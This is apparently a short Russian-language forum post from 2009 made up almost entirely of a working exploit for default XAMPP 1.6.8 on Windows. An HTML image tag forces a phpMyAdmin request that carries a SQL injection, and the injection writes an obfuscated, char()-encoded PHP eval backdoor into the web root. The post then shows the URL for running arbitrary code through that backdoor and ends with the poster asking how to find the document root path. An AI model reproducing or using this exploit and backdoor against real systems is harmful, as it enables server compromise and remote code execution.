Exploit for a Default XAMPP for Windows Version 1.6.8:
<html>
<img
src="http://10.1.1.10/phpmyadmin/tbl_structure.php?db=information_schema&ta
ble=TABLES%60+where+0+union+select+char%2860%2C+63%2C+112%2C+104%2C+112%2C+
32%2C+101%2C+118%2C+97%2C+108%2C+40%2C+115%2C+116%2C+114%2C+105%2C+112%2C+1
15%2C+108%2C+97%2C+115%2C+104%2C+101%2C+115%2C+40%2C+36%2C+95%2C+71%2C+69%2
C+84%2C+91%2C+101%2C+93%2C+41%2C+41%2C+59%2C+63%2C+62%29+into+outfile+%22c%
3A%2Fxampp%2Fhtdocs%2Fbackdoor.php%22+--+1">
</html>
path:
c:/xampp/htdocs/backdoor.php
backdoor:
<?php eval(stripslashes($_GET[e]));?>
The backdoor can be accessed via
http://10.1.1.10/backdoor.php?e=phpinfo();
да но мне вот имена дано найти этот самый путь (path, DOCUMENT_ROOT)
Последний раз редактировалось downloader; 06.02.2009 в 00:44..